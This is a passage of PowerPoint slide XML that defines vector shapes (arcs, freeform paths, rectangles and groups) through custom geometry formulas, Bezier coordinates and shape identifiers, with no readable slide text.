                      <a:pt x="2972" y="0"/>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0"/>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8" name="Arc 1222">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2423AF33-4396-F24E-AD50-B071FEC9BBD3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1263" y="1938"/>
                <a:ext cx="161" cy="118"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="G0" fmla="+- 4434 0 0"/>
                  <a:gd name="G1" fmla="+- 21600 0 0"/>
                  <a:gd name="G2" fmla="+- 21600 0 0"/>
                  <a:gd name="T0" fmla="*/ 0 w 26034"/>
                  <a:gd name="T1" fmla="*/ 460 h 32133"/>
                  <a:gd name="T2" fmla="*/ 23292 w 26034"/>
                  <a:gd name="T3" fmla="*/ 32133 h 32133"/>
                  <a:gd name="T4" fmla="*/ 4434 w 26034"/>
                  <a:gd name="T5" fmla="*/ 21600 h 32133"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="26034" h="32133" fill="none" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="-1" y="459"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1458" y="154"/>
                      <a:pt x="2944" y="0"/>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0"/>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sz="1797" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="66759" name="Arc 1223">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C66AF82-8694-5140-92B2-AFF5708611AF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1308" y="2056"/>
                <a:ext cx="156" cy="119"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="G0" fmla="+- 0 0 0"/>
                  <a:gd name="G1" fmla="+- 16866 0 0"/>
                  <a:gd name="G2" fmla="+- 21600 0 0"/>
                  <a:gd name="T0" fmla="*/ 13494 w 21600"/>
                  <a:gd name="T1" fmla="*/ 0 h 29154"/>
                  <a:gd name="T2" fmla="*/ 17764 w 21600"/>
                  <a:gd name="T3" fmla="*/ 29154 h 29154"/>
                  <a:gd name="T4" fmla="*/ 0 w 21600"/>
                  <a:gd name="T5" fmla="*/ 16866 h 29154"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>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0" name="Arc 1224">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3439D59C-A209-8C4B-A88E-C11707A8AF30}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1308" y="2057"/>
                <a:ext cx="154" cy="117"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="G0" fmla="+- 0 0 0"/>
                  <a:gd name="G1" fmla="+- 16931 0 0"/>
                  <a:gd name="G2" fmla="+- 21600 0 0"/>
                  <a:gd name="T0" fmla="*/ 13413 w 21600"/>
                  <a:gd name="T1" fmla="*/ 0 h 29302"/>
                  <a:gd name="T2" fmla="*/ 17707 w 21600"/>
                  <a:gd name="T3" fmla="*/ 29302 h 29302"/>
                  <a:gd name="T4" fmla="*/ 0 w 21600"/>
                  <a:gd name="T5" fmla="*/ 16931 h 29302"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>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sz="1797" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="66761" name="Arc 1225">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30C41732-294E-A147-BC22-E49AACB1D300}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1257" y="2176"/>
                <a:ext cx="183" cy="172"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="G0" fmla="+- 7124 0 0"/>
                  <a:gd name="G1" fmla="+- 5992 0 0"/>
                  <a:gd name="G2" fmla="+- 21600 0 0"/>
                  <a:gd name="T0" fmla="*/ 27876 w 28724"/>
                  <a:gd name="T1" fmla="*/ 0 h 27592"/>
                  <a:gd name="T2" fmla="*/ 0 w 28724"/>
                  <a:gd name="T3" fmla="*/ 26383 h 27592"/>
                  <a:gd name="T4" fmla="*/ 7124 w 28724"/>
                  <a:gd name="T5" fmla="*/ 5992 h 27592"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>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2" name="Arc 1226">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F243F365-CB56-AF47-BDFA-0F366C006CC8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1257" y="2176"/>
                <a:ext cx="180" cy="169"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="G0" fmla="+- 7122 0 0"/>
                  <a:gd name="G1" fmla="+- 5994 0 0"/>
                  <a:gd name="G2" fmla="+- 21600 0 0"/>
                  <a:gd name="T0" fmla="*/ 27874 w 28722"/>
                  <a:gd name="T1" fmla="*/ 0 h 27594"/>
                  <a:gd name="T2" fmla="*/ 0 w 28722"/>
                  <a:gd name="T3" fmla="*/ 26386 h 27594"/>
                  <a:gd name="T4" fmla="*/ 7122 w 28722"/>
                  <a:gd name="T5" fmla="*/ 5994 h 27594"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>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sz="1797" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="66763" name="Arc 1227">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61C87588-61FA-7040-ADA2-D0FA6C2DB752}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="628" y="2055"/>
                <a:ext cx="99" cy="165"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="G0" fmla="+- 21600 0 0"/>
                  <a:gd name="G1" fmla="+- 21546 0 0"/>
                  <a:gd name="G2" fmla="+- 21600 0 0"/>
                  <a:gd name="T0" fmla="*/ 12768 w 21600"/>
                  <a:gd name="T1" fmla="*/ 41258 h 41258"/>
                  <a:gd name="T2" fmla="*/ 20068 w 21600"/>
                  <a:gd name="T3" fmla="*/ 0 h 41258"/>
                  <a:gd name="T4" fmla="*/ 21600 w 21600"/>
                  <a:gd name="T5" fmla="*/ 21546 h 41258"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21600" h="41258" fill="none" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="12768" y="41257"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="4999" y="37777"/>
                      <a:pt x="0" y="30058"/>
                      <a:pt x="0" y="21546"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="10211"/>
                      <a:pt x="8761" y="804"/>
                      <a:pt x="20068" y="0"/>
                    </a:cubicBezTo>
                  </a:path>
                  <a:path w="21600" h="41258" stroke="0" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="12768" y="41257"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="4999" y="37777"/>
                      <a:pt x="0" y="30058"/>
                      <a:pt x="0" y="21546"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0"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4" name="Arc 1228">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B95C90B5-5F7F-A246-8F18-315C15CE24FE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="630" y="2057"/>
                <a:ext cx="97" cy="161"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="G0" fmla="+- 21600 0 0"/>
                  <a:gd name="G1" fmla="+- 21546 0 0"/>
                  <a:gd name="G2" fmla="+- 21600 0 0"/>
                  <a:gd name="T0" fmla="*/ 12790 w 21600"/>
                  <a:gd name="T1" fmla="*/ 41268 h 41268"/>
                  <a:gd name="T2" fmla="*/ 20072 w 21600"/>
                  <a:gd name="T3" fmla="*/ 0 h 41268"/>
                  <a:gd name="T4" fmla="*/ 21600 w 21600"/>
                  <a:gd name="T5" fmla="*/ 21546 h 41268"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21600" h="41268" fill="none" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="12790" y="41267"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5009" y="37792"/>
                      <a:pt x="0" y="30067"/>
                      <a:pt x="0" y="21546"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="10209"/>
                      <a:pt x="8763" y="802"/>
                      <a:pt x="20072" y="0"/>
                    </a:cubicBezTo>
                  </a:path>
                  <a:path w="21600" h="41268" stroke="0" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="12790" y="41267"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5009" y="37792"/>
                      <a:pt x="0" y="30067"/>
                      <a:pt x="0" y="21546"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0"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sz="1797" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="66765" name="Arc 1229">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{710D9BDF-AE84-7F4E-9391-BCB0208C08EB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="890" y="2279"/>
                <a:ext cx="375" cy="100"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="G0" fmla="+- 21206 0 0"/>
                  <a:gd name="G1" fmla="+- 0 0 0"/>
                  <a:gd name="G2" fmla="+- 21600 0 0"/>
                  <a:gd name="T0" fmla="*/ 39085 w 39085"/>
                  <a:gd name="T1" fmla="*/ 12120 h 21600"/>
                  <a:gd name="T2" fmla="*/ 0 w 39085"/>
                  <a:gd name="T3" fmla="*/ 4108 h 21600"/>
                  <a:gd name="T4" fmla="*/ 21206 w 39085"/>
                  <a:gd name="T5" fmla="*/ 0 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="39085" h="21600" fill="none" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="39085" y="12120"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="35065" y="18049"/>
                      <a:pt x="28368" y="21600"/>
                      <a:pt x="21206" y="21600"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10860" y="21600"/>
                      <a:pt x="1967" y="14264"/>
                      <a:pt x="0" y="4107"/>
                    </a:cubicBezTo>
                  </a:path>
                  <a:path w="39085" h="21600" stroke="0" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="39085" y="12120"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="35065" y="18049"/>
                      <a:pt x="28368" y="21600"/>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6" name="Arc 1230">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7786584-B24C-2E49-8790-D2FFBD1F8807}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="892" y="2279"/>
                <a:ext cx="370" cy="98"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="G0" fmla="+- 21198 0 0"/>
                  <a:gd name="G1" fmla="+- 0 0 0"/>
                  <a:gd name="G2" fmla="+- 21600 0 0"/>
                  <a:gd name="T0" fmla="*/ 39018 w 39018"/>
                  <a:gd name="T1" fmla="*/ 12207 h 21600"/>
                  <a:gd name="T2" fmla="*/ 0 w 39018"/>
                  <a:gd name="T3" fmla="*/ 4150 h 21600"/>
                  <a:gd name="T4" fmla="*/ 21198 w 39018"/>
                  <a:gd name="T5" fmla="*/ 0 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="39018" h="21600" fill="none" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="39017" y="12206"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="34990" y="18085"/>
                      <a:pt x="28323" y="21600"/>
                      <a:pt x="21198" y="21600"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10868" y="21600"/>
                      <a:pt x="1984" y="14286"/>
                      <a:pt x="0" y="4149"/>
                    </a:cubicBezTo>
                  </a:path>
                  <a:path w="39018" h="21600" stroke="0" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="39017" y="12206"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="34990" y="18085"/>
                      <a:pt x="28323" y="21600"/>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sz="1797" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66767" name="Freeform 1231">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF7753DD-23FA-9848-A1F9-C831BF447E43}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1628" y="398"/>
              <a:ext cx="365" cy="183"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 177 w 1460"/>
                <a:gd name="T1" fmla="*/ 0 h 730"/>
                <a:gd name="T2" fmla="*/ 1460 w 1460"/>
                <a:gd name="T3" fmla="*/ 0 h 730"/>
                <a:gd name="T4" fmla="*/ 726 w 1460"/>
                <a:gd name="T5" fmla="*/ 730 h 730"/>
                <a:gd name="T6" fmla="*/ 0 w 1460"/>
                <a:gd name="T7" fmla="*/ 8 h 730"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1460" h="730">
                  <a:moveTo>
                    <a:pt x="177" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1460" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="726" y="730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="8"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="CF0E3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797" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="66768" name="Group 1232">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DFFA31D-FD15-B84E-ADE5-8BCBB1F26E86}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1927" y="332"/>
              <a:ext cx="171" cy="169"/>
              <a:chOff x="1179" y="1966"/>
              <a:chExt cx="171" cy="169"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="66769" name="Freeform 1233">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69101DC3-379C-2F45-A782-E6FF12FFF153}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1203" y="2068"/>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0" name="Freeform 1234">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69F9EDA3-5B37-344A-8B5C-CCE567DB5D8C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1205" y="2070"/>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71" name="Rectangle 1235">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2192E34-28A9-6B4D-BA8B-82E0AD70C0A5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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772" name="Rectangle 1236">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{077A0999-B4E9-1A42-9336-2BE9DE742D50}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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773" name="Freeform 1237">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB75D408-5BC7-B84F-A982-9B1C01E74571}"/>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4" name="Freeform 1238">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04EEBC8C-E3D2-F94B-B971-276D515846ED}"/>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75" name="Freeform 1239">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2A76395-15C9-814F-95DB-022095B092AA}"/>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6" name="Freeform 1240">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E2597B7-8404-484B-B333-396B9B5E2DBA}"/>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777" name="Freeform 1241">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD630845-9827-1E40-8B37-B96CF926BE12}"/>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8" name="Freeform 1242">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F1FCFAE-3B85-ED44-BF6B-FB3F0F7FD581}"/>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79" name="Rectangle 1243">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE86F5AB-FD51-5B42-936A-EB554F360C16}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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780" name="Rectangle 1244">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B19DD0A-2E1D-E34B-B974-E728A8D5AF44}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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781" name="Freeform 1245">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38498F21-A460-3D4E-AF2C-8E3F205FEFB4}"/>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82" name="Freeform 1246">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D714677-1DAA-0E47-BE4F-2C37B6B05BE9}"/>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83" name="Freeform 1247">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81E91FC5-FC16-1F47-8014-780966C07ACB}"/>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84" name="Freeform 1248">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E32C45DB-A345-344B-8988-947D1B168BB4}"/>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85" name="Freeform 1249">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{213D49F9-B225-6F42-8B44-2E866F35A221}"/>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86" name="Freeform 1250">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26A20455-D3B8-5C4A-A219-C65865240A77}"/>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87" name="Rectangle 1251">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DC4E7CB-743D-F241-B889-35DFDFBB830F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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788" name="Rectangle 1252">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7969496B-BFF0-CA4E-A755-F73F4426E666}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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789" name="Group 1253">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F895985-38F4-404F-9194-F32FE397365E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1971" y="370"/>
              <a:ext cx="94" cy="56"/>
              <a:chOff x="1223" y="2004"/>
              <a:chExt cx="94" cy="56"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="66790" name="Group 1254">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A7EACDE-52AA-2242-A832-B4A29C35BED1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1223" y="2004"/>
                <a:ext cx="93" cy="56"/>
                <a:chOff x="1223" y="2004"/>
                <a:chExt cx="93" cy="56"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
